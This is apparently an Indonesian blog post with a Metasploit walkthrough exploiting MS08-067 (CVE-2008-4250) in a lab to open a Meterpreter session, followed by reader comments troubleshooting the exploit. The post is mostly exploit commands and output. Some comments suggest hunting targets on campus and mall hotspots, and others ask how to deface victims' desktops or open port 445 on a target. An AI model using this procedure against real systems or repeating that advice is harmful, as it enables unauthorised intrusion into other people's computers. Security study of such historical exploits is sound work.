MS08-067
msf > version
Framework: 3.2-testing.5773
Console : 3.2-testing.5773
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
msf exploit(ms08_067_netapi) > info windows/smb/ms08_067_netapi
Name: Microsoft Server Service Relative Path Stack Corruption
Version: 5803
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Provided by:
hdm
Available targets:
Id Name
-- ----
0 Windows XP SP2 English (DEP)
1 Windows XP SP3 English (DEP)
2 Windows 2003 SP0 English (NO DEP)
3 Windows 2003 SP2 English (NO DEP)
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload information:
Space: 400
Avoid: 7 characters
Description:
This module exploits a parsing flaw in the path canonicalization
code of NetAPI32.dll through the Server Service. This module is
capable of bypassing DEP on some operating systems and service
packs. The correct target must be used to prevent the Server Service
(along with a dozen others in the same process) from crashing.
Windows XP targets seem to handle multiple successful exploitation
events, but 2003 targets will often crash or hang on subsequent
attempts. This is just the first version of this module, full
support for DEP bypass on 2003, along with other platforms, is still
in development.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-4250
http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx
msf exploit(ms08_067_netapi) > set RHOST 192.168.132.130
RHOST => 192.168.132.130
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set TARGET 0
TARGET => 0
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Connecting to the target...
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.132.130[\BROWSER] ...
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.132.130[\BROWSER] ...
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73227 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.132.1:51707 -> 192.168.132.130:4444)
meterpreter > sysinfo
Computer: Research-1
OS : Windows XP (Build 2600, Service Pack 2).
Lagi-lagi netbios menjadi pintu masuk Microsoft Windows. Mungkin sudah saatnya pemberi tutorial melupakan RPC DCOM holes untuk contoh menembus Microsoft Windows via Metasploit.
I think everyone love 2008…
October 31st, 2008 at 12:43 pm
wah thanks nih omz, btw kok yg versi framework 3.2 yg buat win blm keluar ya
November 1st, 2008 at 6:54 am
Metasploit 3.2 kan msh testing, utk mendapatkan versi itu bisa dengan cara update lngsng dari trunk nya via svn
November 3rd, 2008 at 1:42 pm
AFAIK, target 0 bukankah option windows 2000 ?, jika benar berarti kemungkinan ret addr-nya sama kah,(and kayaknya enggak deh) so wierd
, btw bisa exploit buatan EMM. anyway sepertinya development MSF makin tersendat neh 
.. hehe
November 3rd, 2008 at 3:53 pm
#3 tergantung versi nya, klo update svn terbaru udah lbh banyak lagi data target nya dari berbagai locale hasil sumbangan komunitas MSF worldwide. Tulisan diatas menggunakan release yg awal2. RET ADDR ya beda lah. Hihi, iya ya sjk spoonm sama skape gak jd core developer kyknya bakal terjadi perubahan nih
msf > version
Framework: 3.2-testing.5773
Console : 3.2-testing.5773
msf exploit(ms08_067_netapi) > show targets
Exploit targets:
Id Name
— —-
0 Windows 2000 English
1 Windows XP SP0 English (NO NX)
2 Windows XP SP1 English (NO NX)
3 Windows XP SP2 English (NX)
4 Windows XP SP2 French (NX)
5 Windows XP SP2 Italian (NX)
6 Windows XP SP2 Portuguese (Brazil) (NX)
7 Windows XP SP2 German (NX)
8 Windows XP SP2 Chinese (NX)
9 Windows XP SP3 French (NX)
10 Windows XP SP3 English (NX)
11 Windows XP SP3 Spanish (NX)
12 Windows XP SP3 German (NX)
13 Windows XP SP3 Portuguese (Brazil) (NX)
14 Windows 2003 SP0 English (NO NX)
15 Windows 2003 SP1 English (NO NX)
16 Windows 2003 SP2 English (NO NX)
17 Windows 2003 SP1 English (NX)
18 Windows 2003 SP2 English (NX)
November 5th, 2008 at 10:02 am
hahaha, iya, sori gak liat kalo dah lo list di artikel (hmm, kurang jeli aje), gw lama ga pake MSF, masih konvensional terpaku di single exploit (rilisnya lebih cepat, apalagi kalo dari irc
)
iya, ditambah lagi isu perubahan lisensi, lagian keknya emang ada isu politis soal di tunda-tundanya rilis exploit ini. Mikocok ketakutan sepertinya
November 6th, 2008 at 4:19 pm
mas, sy sdh mengupdate metasploit hari kamis, 6 Nov 2008 (command = “svn update”), tapi kok g jalan ya…
errornya seperti ini
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[-] Exploit failed: can’t convert nil into Integer
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >
padahal ketika saya update hari rabu, 5 nov 2008 exploit berjalan,,padahal dengan komputer yg sama (LAN sediri, kok).tu kenapa, ya mas?
ato saya bisa minta file “ms08_067_netapi.rb” punya mas itu?tolong kirimkan ke e-mail sy ya, mas…
terima kasih…
November 6th, 2008 at 10:16 pm
@poniman_coy
kalo mao pake versi yang 3.2-testing di WINDOWS harus update melalui svn update. Caranya “svn co http://metasploit.com/svn/framework3/trunk”
@franky
“Exploit failed: can’t convert nil into Integer”. Kata ownernya HD-Moore pas saya contact, dia bilang emang untuk SP tertentu terjadi seperti itu..but, hold on..coba deh liat scriptnya pake notepad.
find word: “Sratch” replace ke “Scratch”.itu untuk patch revisi 5846 gagal menurut ku. coba nantikan aja patch selanjutnya mungkin typonya sudah dibenarkan.
TO all: i new here, need learn much from you all. esspesially making exploit code.
Thank’s
-Corbinz-
November 7th, 2008 at 12:56 pm
# 6, seperti yang dikatakan oleh CorbinZ, terdapat typo atau salah tulis untuk setiap target dibagian Scratch address nya. Pada update tsb tertulis Sratch bukan Scratch, saya sudah coba update dengan trunk yang sama dengan kamu dan mendapatkan error yg sama, cukup ganti Sratch dengan Scratch.
$ sed s/Sratch/Scratch/g ms08_067_netapi.rb
# 7, Welcome… =)
November 7th, 2008 at 1:09 pm
Woh makin keren saja., anak-anak muda jaman sekarang..
**pakek metasploit aja ga pernah dan ga bisa
November 8th, 2008 at 10:20 am
** Duh, gak pernah bisa pakek Metasploit… Nasib deh **
November 8th, 2008 at 2:41 pm
@corbinZ and @staff
exploitnya sdh berjalan kembali, thanks bgt mas….
@ph03n1x and @scut
dicoba aja terus, jgn menyerah n klo da error kan bisa di diskusikan disini….
November 9th, 2008 at 3:15 am
#10
makane mbut, tidak nunggu kiriman! Cari sendiri =))
#11
Siaaapppppppppppp juragan
November 10th, 2008 at 4:15 am
saya dah install BT3F, trus dah update msf3 nya. kira2 proses lanjutan yg pake “PAYLOAD windows/meterpreter/bind_tcp” gimana ya? maaf pengen tau aj. gak ada lahan buat uji coba. terima kasih yg dah mau jawab.
November 10th, 2008 at 7:48 am
@QU1NT1N
ketik ja “help”, ntar da pilihan fitur2 pa ja yg da pada meterpreter….
Selamat mencoba..
November 10th, 2008 at 1:38 pm
@CorbinZ thanks broo berjalan dianya,
November 10th, 2008 at 5:30 pm
gitu ya mas franky? ya udah, tak pinjem cd bajakan dulu…
November 10th, 2008 at 6:45 pm
wah kenapa ya mas, pas saya jalankan svn co http://metasploit.com/svn/framework3/trunk ya dia jalan, trus udh selesai ada tulisan cek revision 5846, nah kan sarannya mas diatas buat replace kata Sratch dengan Scratch. pas aku cek kata sratch udah gk ada lg yang ada Scratch, jadi kan udah bener, nah jadi pas saya use windows/smb/ms08_067_netapi kok failed apa masih ada yang salah ya ? apa karena saya pake metas yg 3.0 apa mesti pake yang 3.1 ?
November 11th, 2008 at 11:58 am
http://www.kecoak-elektronik.net/log/2008/10/31/ms08-067/
check this out…
November 11th, 2008 at 12:00 pm
http://video.google.com/videoplay?docid=-5555664098592837592
November 11th, 2008 at 1:12 pm
#12 Aku tanggal 15 November ke Bandung, kalau kau mau ikut coba confirmasi ke Opik.
November 11th, 2008 at 10:53 pm
@poniman_coy
YUP…pake yang 3.1 aja kan lebih up to date…
November 11th, 2008 at 11:22 pm
#20, titip liat awewe-awewe di bandung nyak, dah lama gak jenguk =))
November 12th, 2008 at 1:00 am
@CorbinZ saya coba omz…
@http://video.google.com/videoplay?docid=-5555664098592837592 , bisa buta liat tu video…pecah gambarnya..
November 12th, 2008 at 4:54 am
minta ijin download videonya.
November 17th, 2008 at 4:53 am
Saya menggunakan Metasploit versi 3.1 untuk Windows. Sudah diupdate menggunakan file Online Update, tapi belum ad juga tuh exploit untuk MS08-067… saya sudah punya ms08_067_netapi.rb , lalu bagaimana untuk mengintegrasikanny ke dalam Framework Metasploitnya???
Trim’s
November 18th, 2008 at 2:47 pm
Mas, gimana setting di svn kalo pake http proxy, aku coba kok gagal melulu
November 19th, 2008 at 9:08 am
ko udah a “svn co http://metasploit.com/svn/framework3/trunk” masih
msf > version
Framework: 3.1-release.5366
Console : 3.1-release.5404
udah aku “svn update” keluarnya
Skipped ‘.’
mohon solusinya dong
December 1st, 2008 at 10:33 am
wah masih bingung hehehehe.. bener” ngga ada tempat buat explorasinya sih..
December 5th, 2008 at 8:26 am
@f4riz
km download aja yg versi 3.2, kan sudah release…
@b4tn3t
soal target, kan bisa cari di kampus2 n mall2 yg nyediakan hotspot…
ada yg tau atau punya video untuk deface tampilan desktop nya??
thanks semua…
December 10th, 2008 at 10:37 pm
@franky
iy ni, udah download ko and sudah berhasil, terima kasih semua buat anak2 kecoak, nambah ilmu ni
December 20th, 2008 at 10:56 pm
Keren tuh, tinggal bagaimana cara mempertahankannya. Ada yang tahu? Jangan sampe habis menyerang, kita malah diserang kalah total
)
Btw, ada yang tahu cara install modul/exploit tambahan di metasploit nggak ?
December 30th, 2008 at 8:51 pm
^– di jalanin aja Start -> Programs -> Metasploit 3 -> Online Update,,
nanti dia download sendiri koq ^_^
Wah,, mantab2, bisa lho dipake ke XP SP2,
btw, gimana caranya supaya kita bisa ngebuka port 445 di komp target supaya bisa masukin exploit ini?ada yang tahu?plz . . .
January 8th, 2009 at 6:03 pm
#31
Mempertahankan? update aja windoznya :p
#32
Ngebuka port? uninstall updatenya :p
February 1st, 2009 at 12:42 am
cara puka port mah susah kali ya, mendingan scan port 445. Tp yo suwi yooo…
May 15th, 2009 at 10:23 pm
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability…
[*] Exploit completed, but no session was created.
# koq ga bisa yahhhh ?? ada ide temn2 ?
June 11th, 2009 at 6:31 am
iya nih problem sama kaya #35
…..
[*] Triggering the vulnerability…
[*] Exploit completed, but no session was created.
knapa tuh om?
July 18th, 2009 at 9:05 am
Sama tuh … ga pernah berhasil.
Slalu GAGAL truz…fyuuuuhhhh
July 30th, 2009 at 12:21 pm
siang yang panas :
sa coba ngikut ini tapi ko selalu muncul :
>> exploit
[*] Started bind handler
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 2 – lang:English [*] Selected Target: Windows XP SP2 English (NX) [*] Triggering the vulnerability…
[*] Exploit completed, but no session was created.
tq : infonya
October 6th, 2009 at 4:40 pm
Metasploit 3.2 yg versi portable bisa didownload di http://www.indowebster.com/Metasploit_Framework_32_Portable.html Silakan gunakan dengan bijak.
Aq nyoba sama seperti tutorial. Session DOS promptnya tidak muncul. Klo pake payload windows/shell_bind_tcp, sessionnya langsung close klo pengen buka DOS promptnya target. Ada yg tau penyebabnya? Ini outputnya:
[*] Started bind handler
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 3 – lang:English [*] Selected Target: Windows XP SP3 English (NX) [*] Triggering the vulnerability…
[*] Command shell session 2 opened (192.168.0.6:1661 -> 192.168.0.1:4545) [*] Command shell session 2 closed.
October 24th, 2009 at 12:28 am
lol
happy playing
playing for happy
wtf